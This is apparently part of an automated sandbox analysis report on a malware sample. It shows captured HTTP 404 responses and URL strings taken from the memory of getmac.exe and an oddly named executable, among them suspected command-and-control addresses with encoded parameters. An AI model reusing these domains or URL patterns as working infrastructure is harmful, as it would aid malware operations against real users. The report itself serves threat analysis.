Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 06 Aug 2024 05:59:37 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 65 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c4 30 10 85 ef fd 15 e3 9e f4 60 a6 2e 15 14 42 c0 dd 76 71 a1 ae 65 cd 1e 3c a6 cd 2c 29 74 9b 9a a4 16 ff bd 69 17 c1 cb c0 9b f9 de e3 0d bf c9 df b7 f2 b3 2a e0 55 be 95 50 9d 36 e5 7e 0b ab 7b c4 7d 21 77 88 b9 cc af 97 35 4b 11 8b c3 4a 24 dc 84 4b 27 b8 21 a5 a3 08 6d e8 48 64 69 06 07 1b 60 67 c7 5e 73 bc 2e 13 8e 0b c4 6b ab 7f 66 df 83 f8 c7 44 95 f0 41 48 43 e0 e8 6b 24 1f 48 c3 e9 58 c2 a4 3c f4 91 3b cf 1c d8 1e 82 69 3d 78 72 df e4 18 c7 61 4e 72 71 28 ad 1d 79 2f 5e 06 d5 18 c2 35 cb d8 e3 33 dc e6 54 b7 aa bf 83 8f c5 00 2a c0 34 4d cc 5f 94 37 8d 6d 7b d6 74 63 0d 95 75 01 9e 52 8e 7f 21 b1 eb d2 32 f6 9a bf 4b 7e 01 00 00 ff ff 0d 0a 61 0d 0a 03 00 77 cb be 04 18 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e8LAK0`.Bvqe<,)tiUP6~{}!w5KJ$K'!mHdi`g^s.kfDAHCk$HX<;i=xraNrq(y/^53T4M_7m{tcuR!2K~aw0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 06 Aug 2024 05:59:39 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 65 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c4 30 10 85 ef fd 15 e3 9e f4 60 a6 2e 15 14 42 c0 dd 76 71 a1 ae 65 cd 1e 3c a6 cd 2c 29 74 9b 9a a4 16 ff bd 69 17 c1 cb c0 9b f9 de e3 0d bf c9 df b7 f2 b3 2a e0 55 be 95 50 9d 36 e5 7e 0b ab 7b c4 7d 21 77 88 b9 cc af 97 35 4b 11 8b c3 4a 24 dc 84 4b 27 b8 21 a5 a3 08 6d e8 48 64 69 06 07 1b 60 67 c7 5e 73 bc 2e 13 8e 0b c4 6b ab 7f 66 df 83 f8 c7 44 95 f0 41 48 43 e0 e8 6b 24 1f 48 c3 e9 58 c2 a4 3c f4 91 3b cf 1c d8 1e 82 69 3d 78 72 df e4 18 c7 61 4e 72 71 28 ad 1d 79 2f 5e 06 d5 18 c2 35 cb d8 e3 33 dc e6 54 b7 aa bf 83 8f c5 00 2a c0 34 4d cc 5f 94 37 8d 6d 7b d6 74 63 0d 95 75 01 9e 52 8e 7f 21 b1 eb d2 32 f6 9a bf 4b 7e 01 00 00 ff ff 0d 0a 61 0d 0a 03 00 77 cb be 04 18 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e8LAK0`.Bvqe<,)tiUP6~{}!w5KJ$K'!mHdi`g^s.kfDAHCk$HX<;i=xraNrq(y/^53T4M_7m{tcuR!2K~aw0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 06 Aug 2024 05:59:42 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 65 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c4 30 10 85 ef fd 15 e3 9e f4 60 a6 2e 15 14 42 c0 dd 76 71 a1 ae 65 cd 1e 3c a6 cd 2c 29 74 9b 9a a4 16 ff bd 69 17 c1 cb c0 9b f9 de e3 0d bf c9 df b7 f2 b3 2a e0 55 be 95 50 9d 36 e5 7e 0b ab 7b c4 7d 21 77 88 b9 cc af 97 35 4b 11 8b c3 4a 24 dc 84 4b 27 b8 21 a5 a3 08 6d e8 48 64 69 06 07 1b 60 67 c7 5e 73 bc 2e 13 8e 0b c4 6b ab 7f 66 df 83 f8 c7 44 95 f0 41 48 43 e0 e8 6b 24 1f 48 c3 e9 58 c2 a4 3c f4 91 3b cf 1c d8 1e 82 69 3d 78 72 df e4 18 c7 61 4e 72 71 28 ad 1d 79 2f 5e 06 d5 18 c2 35 cb d8 e3 33 dc e6 54 b7 aa bf 83 8f c5 00 2a c0 34 4d cc 5f 94 37 8d 6d 7b d6 74 63 0d 95 75 01 9e 52 8e 7f 21 b1 eb d2 32 f6 9a bf 4b 7e 01 00 00 ff ff 0d 0a 61 0d 0a 03 00 77 cb be 04 18 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e8LAK0`.Bvqe<,)tiUP6~{}!w5KJ$K'!mHdi`g^s.kfDAHCk$HX<;i=xraNrq(y/^53T4M_7m{tcuR!2K~aw0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 06 Aug 2024 05:59:42 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 65 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c4 30 10 85 ef fd 15 e3 9e f4 60 a6 2e 15 14 42 c0 dd 76 71 a1 ae 65 cd 1e 3c a6 cd 2c 29 74 9b 9a a4 16 ff bd 69 17 c1 cb c0 9b f9 de e3 0d bf c9 df b7 f2 b3 2a e0 55 be 95 50 9d 36 e5 7e 0b ab 7b c4 7d 21 77 88 b9 cc af 97 35 4b 11 8b c3 4a 24 dc 84 4b 27 b8 21 a5 a3 08 6d e8 48 64 69 06 07 1b 60 67 c7 5e 73 bc 2e 13 8e 0b c4 6b ab 7f 66 df 83 f8 c7 44 95 f0 41 48 43 e0 e8 6b 24 1f 48 c3 e9 58 c2 a4 3c f4 91 3b cf 1c d8 1e 82 69 3d 78 72 df e4 18 c7 61 4e 72 71 28 ad 1d 79 2f 5e 06 d5 18 c2 35 cb d8 e3 33 dc e6 54 b7 aa bf 83 8f c5 00 2a c0 34 4d cc 5f 94 37 8d 6d 7b d6 74 63 0d 95 75 01 9e 52 8e 7f 21 b1 eb d2 32 f6 9a bf 4b 7e 01 00 00 ff ff 0d 0a 61 0d 0a 03 00 77 cb be 04 18 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e8LAK0`.Bvqe<,)tiUP6~{}!w5KJ$K'!mHdi`g^s.kfDAHCk$HX<;i=xraNrq(y/^53T4M_7m{tcuR!2K~aw0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 06 Aug 2024 05:59:44 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 280Connection: closeVary: Accept-EncodingData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 39 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 73 6d 61 73 68 63 6f 69 6e 2e 63 6c 75 62 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.59 (Debian) Server at www.smashcoin.club Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 06 Aug 2024 06:00:05 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 06 Aug 2024 06:00:07 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 06 Aug 2024 06:00:10 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 06 Aug 2024 06:00:12 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->

Source: getmac.exe, 00000004.00000002.3833043675.0000000005E9A000.00000004.10000000.00040000.00000000.sdmp, hoCcQGubWgo.exe, 00000006.00000002.3831925360.000000000381A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://4u2b.online/mm8l/?wLTtn0=QJHPEyd/9nGk0pWFnTVCTHVJEZeUTkkF6sY
Source: getmac.exe, 00000004.00000002.3833043675.0000000006E4E000.00000004.10000000.00040000.00000000.sdmp, hoCcQGubWgo.exe, 00000006.00000002.3831925360.00000000047CE000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://keswickstream.online/8yn3/?wLTtn0=U19dcxmn6Ob5yxqWvQsW%20QP5HF1VJp%2FR08%2FTqyg6Y00c2I58wx0m%
Source: getmac.exe, 00000004.00000002.3833043675.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, hoCcQGubWgo.exe, 00000006.00000002.3831925360.00000000034F6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://tilda.cc
Source: getmac.exe, 00000004.00000002.3833043675.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, hoCcQGubWgo.exe, 00000006.00000002.3831925360.00000000034F6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://tilda.ws/img/logo404.png
Source: getmac.exe, 00000004.00000002.3833043675.0000000005D08000.00000004.10000000.00040000.00000000.sdmp, hoCcQGubWgo.exe, 00000006.00000002.3831925360.0000000003688000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.meetfactory.biz/m6nq?gp=1&js=1&uuid=1722923852.0095214278&other_args=eyJ1cmkiOiAiL202bnEi
Source: hoCcQGubWgo.exe, 00000006.00000002.3833798452.0000000005420000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.moodplay.store
Source: hoCcQGubWgo.exe, 00000006.00000002.3833798452.0000000005420000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.moodplay.store/utgc/
Source: getmac.exe, 00000004.00000002.3833043675.00000000061BE000.00000004.10000000.00040000.00000000.sdmp, hoCcQGubWgo.exe, 00000006.00000002.3831925360.0000000003B3E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.ytonetgearhub.shop/l8y2?gp=1&js=1&uuid=1722923892.9737034374&other_args=eyJ1cmkiOiAiL2w4e
Source: hoCcQGubWgo.exe, 00000006.00000002.3831925360.0000000003688000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www70.meetfactory.biz/
Source: hoCcQGubWgo.exe, 00000006.00000002.3831925360.0000000003B3E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www70.ytonetgearhub.shop/
Source: getmac.exe, 00000004.00000003.1752458219.00000000081CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: getmac.exe, 00000004.00000002.3835029456.0000000007EE0000.00000004.00000800.00020000.00000000.sdmp, getmac.exe, 00000004.00000002.3833043675.00000000064E2000.00000004.10000000.00040000.00000000.sdmp, hoCcQGubWgo.exe, 00000006.00000002.3831925360.0000000003E62000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://badges.ausowned.com.au/07634
Source: getmac.exe, 00000004.00000003.1752458219.00000000081CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: getmac.exe, 00000004.00000002.3833043675.0000000006674000.00000004.10000000.00040000.00000000.sdmp, hoCcQGubWgo.exe, 00000006.00000002.3831925360.0000000003FF4000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/gsap/1.20.2/TweenMax.min.js
Source: getmac.exe, 00000004.00000002.3833043675.0000000006674000.00000004.10000000.00040000.00000000.sdmp, hoCcQGubWgo.exe, 00000006.00000002.3831925360.0000000003FF4000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css
Source: getmac.exe, 00000004.00000003.1752458219.00000000081CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: getmac.exe, 00000004.00000003.1752458219.00000000081CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: getmac.exe, 00000004.00000002.3833043675.0000000007172000.00000004.10000000.00040000.00000000.sdmp, hoCcQGubWgo.exe, 00000006.00000002.3831925360.0000000004AF2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://code.jquery.com/jquery-3.5.1.min.js
Source: getmac.exe, 00000004.00000003.1752458219.00000000081CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: getmac.exe, 00000004.00000003.1752458219.00000000081CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: getmac.exe, 00000004.00000003.1752458219.00000000081CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: getmac.exe, 00000004.00000002.3833043675.0000000006674000.00000004.10000000.00040000.00000000.sdmp, hoCcQGubWgo.exe, 00000006.00000002.3831925360.0000000003FF4000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=Roboto
Source: getmac.exe, 00000004.00000002.3833043675.0000000007172000.00000004.10000000.00040000.00000000.sdmp, hoCcQGubWgo.exe, 00000006.00000002.3831925360.0000000004AF2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://gamesfunny.top$
Source: getmac.exe, 00000004.00000002.3820332065.00000000032A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: getmac.exe, 00000004.00000002.3820332065.00000000032A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: getmac.exe, 00000004.00000002.3820332065.00000000032A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: getmac.exe, 00000004.00000002.3820332065.00000000032A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: getmac.exe, 00000004.00000002.3820332065.00000000032A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: getmac.exe, 00000004.00000002.3820332065.00000000032A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: getmac.exe, 00000004.00000003.1747409287.00000000081AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: getmac.exe, 00000004.00000002.3833043675.0000000006674000.00000004.10000000.00040000.00000000.sdmp, hoCcQGubWgo.exe, 00000006.00000002.3831925360.0000000003FF4000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://s3-us-west-2.amazonaws.com/s.cdpn.io/16327/MorphSVGPlugin.min.js
Source: getmac.exe, 00000004.00000002.3833043675.0000000006674000.00000004.10000000.00040000.00000000.sdmp, hoCcQGubWgo.exe, 00000006.00000002.3831925360.0000000003FF4000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://s3-us-west-2.amazonaws.com/s.cdpn.io/16327/SplitText.min.js
Source: getmac.exe, 00000004.00000002.3833043675.0000000007172000.00000004.10000000.00040000.00000000.sdmp, hoCcQGubWgo.exe, 00000006.00000002.3831925360.0000000004AF2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://securepubads.g.doubleclick.net/tag/js/gpt.js
Source: getmac.exe, 00000004.00000002.3835029456.0000000007EE0000.00000004.00000800.00020000.00000000.sdmp, getmac.exe, 00000004.00000002.3833043675.00000000064E2000.00000004.10000000.00040000.00000000.sdmp, hoCcQGubWgo.exe, 00000006.00000002.3831925360.0000000003E62000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://ventraip.com.au/favicon.ico
